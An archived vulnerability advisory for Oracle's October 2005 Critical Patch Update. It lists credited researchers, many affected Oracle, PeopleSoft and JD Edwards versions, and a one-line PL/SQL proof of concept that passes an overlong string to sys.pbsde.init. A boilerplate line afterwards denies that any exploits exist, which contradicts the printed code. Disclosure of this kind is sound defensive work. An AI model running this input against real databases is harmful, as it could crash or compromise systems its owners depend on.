| Title |
Oracle October Security Update Multiple Vulnerabilities |
| Published |
2005-10-18-12:00AM |
| Updated |
2005-11-08-05:53PM |
| Class |
Unknown |
| CVE |
CAN-2005-0873 |
| Remote |
Yes |
| Local |
Yes |
| Credit |
The following people are credited for the discovery of vulnerabilities listed in the Critical Patch Update:
Brian Carr; Sacha Faust of S.P.I. Dynamics, Inc.; Esteban Martínez Fayó of Application Security, Inc.; Alexander Kornbrust of Red Database Security |
| Vulnerable |
PeopleSoft PeopleTools 8.46.3
PeopleSoft PeopleTools 8.45.5
PeopleSoft PeopleTools 8.43
PeopleSoft PeopleTools 8.42
PeopleSoft PeopleTools 8.41
PeopleSoft PeopleTools 8.40
PeopleSoft PeopleTools 8.20.7
PeopleSoft PeopleTools 8.20
PeopleSoft PeopleTools 8.19
PeopleSoft PeopleTools 8.18
PeopleSoft PeopleTools 8.17
PeopleSoft PeopleTools 8.16
PeopleSoft PeopleTools 8.15
PeopleSoft PeopleTools 8.14
PeopleSoft PeopleTools 8.13
PeopleSoft PeopleTools 8.12
PeopleSoft PeopleTools 8.11
PeopleSoft PeopleTools 8.10
PeopleSoft CRM 8.9
PeopleSoft CRM 8.8.1
Oracle Workflow 11.5.9.5
Oracle Workflow 11.5.1
Oracle Oracle9i Standard Edition 9.2.0.6
Oracle Oracle9i Standard Edition 9.2.0.5
Oracle Oracle9i Standard Edition 9.0.1.5 FIPS
Oracle Oracle9i Standard Edition 9.0.1.5
Oracle Oracle9i Standard Edition 9.0.1.4
Oracle Oracle9i Personal Edition 9.2.0.6
Oracle Oracle9i Personal Edition 9.2.0.5
Oracle Oracle9i Personal Edition 9.0.1.5 FIPS
Oracle Oracle9i Personal Edition 9.0.1.5
Oracle Oracle9i Personal Edition 9.0.1.4
Oracle Oracle9i Enterprise Edition 9.2.0.6
Oracle Oracle9i Enterprise Edition 9.2.0.5
Oracle Oracle9i Enterprise Edition 9.0.1.5 FIPS
Oracle Oracle9i Enterprise Edition 9.0.1.5
Oracle Oracle9i Enterprise Edition 9.0.1.4
Oracle Oracle9i Application Server Web Cache 9.0.3.1
Oracle Oracle9i Application Server Web Cache 9.0.2.3
Oracle Oracle9i Application Server 9.2.0.7
Oracle Oracle9i Application Server 9.2.0.6
Oracle Oracle9i Application Server 9.0.3.1
Oracle Oracle9i Application Server 9.0.2.3
Oracle Oracle8i Standard Edition 8.1.7.4
Oracle Oracle8i Standard Edition 8.0.6.3
Oracle Oracle8i Standard Edition 8.0.6
Oracle Oracle8i Enterprise Edition 8.1.7.4
Oracle Oracle8 8.0.6.3
Oracle Oracle8 8.0.6
Oracle Oracle10g Standard Edition 10.1.0.4.2
Oracle Oracle10g Standard Edition 10.1.0.4
Oracle Oracle10g Standard Edition 10.1.0.3.1
Oracle Oracle10g Standard Edition 10.1.0.3
Oracle Oracle10g Standard Edition 10.1.0.2
Oracle Oracle10g Personal Edition 10.1.0.4
Oracle Oracle10g Personal Edition 10.1.0.3.1
Oracle Oracle10g Personal Edition 10.1.0.3
Oracle Oracle10g Personal Edition 10.1.0.2
Oracle Oracle10g Enterprise Edition 10.1.0.4
Oracle Oracle10g Enterprise Edition 10.1.0.3.1
Oracle Oracle10g Enterprise Edition 10.1.0.3
Oracle Oracle10g Enterprise Edition 10.1.0.2
Oracle Oracle10g Application Server 10.1.2
Oracle Oracle10g Application Server 10.1.0.4
Oracle Oracle10g Application Server 10.1.0.3.1
Oracle Oracle10g Application Server 10.1.0.3
Oracle Oracle10g Application Server 10.1.0.2
Oracle Oracle 9i Application Server Release 1 1.0.2.2
Oracle JD Edwards EnterpriseOne 8.95_B1
Oracle JD Edwards EnterpriseOne 8.94_Q1
Oracle JD Edwards EnterpriseOne SP23_K1
Oracle Enterprise Manager Grid Control 10g 10.1.0.4
Oracle Enterprise Manager Grid Control 10g 10.1.0.3
Oracle Enterprise Manager Database Control 10g 10.1.0.4
Oracle Enterprise Manager Database Control 10g 10.1.0.3
Oracle Enterprise Manager Application Server Control 9.0.4.2
Oracle Enterprise Manager Application Server Control 9.0.4.1
Oracle Enterprise Manager 9.0.4.1
Oracle EBusiness Suite 11i 11.5.9
Oracle EBusiness Suite 11i 11.5.8
Oracle EBusiness Suite 11i 11.5.7
Oracle EBusiness Suite 11i 11.5.6
Oracle EBusiness Suite 11i 11.5.5
Oracle EBusiness Suite 11i 11.5.4
Oracle EBusiness Suite 11i 11.5.3
Oracle EBusiness Suite 11i 11.5.2
Oracle EBusiness Suite 11i 11.5.1
Oracle EBusiness Suite 11i 11.5.10
Oracle EBusiness Suite 11i 11.5
Oracle EBusiness Suite 11.0
Oracle Developer Suite 10.1.2
Oracle Developer Suite 9.0.4.2
Oracle Developer Suite 9.0.4.1
Oracle Developer Suite 9.0.2.1
Oracle Collaboration Suite Release 2 9.0.4.2
Oracle Collaboration Suite Release 1 10.1.1
Oracle Collaboration Suite Release 1
Oracle Clinical 4.5.1
Oracle Clinical 4.5
Oracle Application Server Release 2 10.1.2.0.2
Oracle Application Server Release 2 10.1.2.0.1
Oracle Application Server Release 2 10.1.2.0.0
Oracle Application Server Release 2 9.0.2.3
Oracle Application Server Release 2 9.0.2.1
Oracle Application Server 10g 9.0.4.2
Oracle Application Server 10g 9.0.4.1
Oracle Application Server 10g 9.0.4
HP HPUX 11.23
HP HPUX 11.11
HP HPUX B.11.23
HP HPUX B.11.11 |
| Not Vulnerable |
|
| Code |
An exploit would not be required for some of these issues such as the SQL injection vulnerabilities. Other issues would likely require exploit code.
The following proof of concept code provided by <oracle_secalert@hushmail.com> is available for DB27:
SQL> exec sys.pbsde.init('AA',TRUE,'MARY_ANN_DAVIDSON_MARY_ANN_DAVIDSON_MARY_ANN_DAVIDSON_MARY_ANN_DAVIDSON_MARY_ANN_DAVIDSON_MARY_ANN_DAVIDSON_MARY_ANN_DAVIDSON_MARY_ANN_DAVIDSON_MARY_ANN_DAVIDSON_MARY_ANN_DAVIDSON_MARY_ANN_DAVIDSON_MARY_ANN_DAVIDSON',NULL);
BEGIN sys.pbsde.init('AA',TRUE,'MARY_ANN_DAVIDSON_MARY_ANN_DAVIDSON_MARY_ANN_DAVIDSON_MARY_ANN_DAVIDSON_MARY_ANN_DAVIDSON_MARY_ANN_DAVIDSON_MARY_ANN_DAVIDSON_MARY_ANN_DAVIDSON_MARY_ANN_DAVIDSON_MARY_ANN_DAVIDSON_MARY_ANN_DAVIDSON_MARY_ANN_DAVIDSON',NULL); END;
---
Currently we are not aware of any exploits for this issue. If you feel we are in error or are aware of more recent information, please mail us at: content@securitydot.net.
|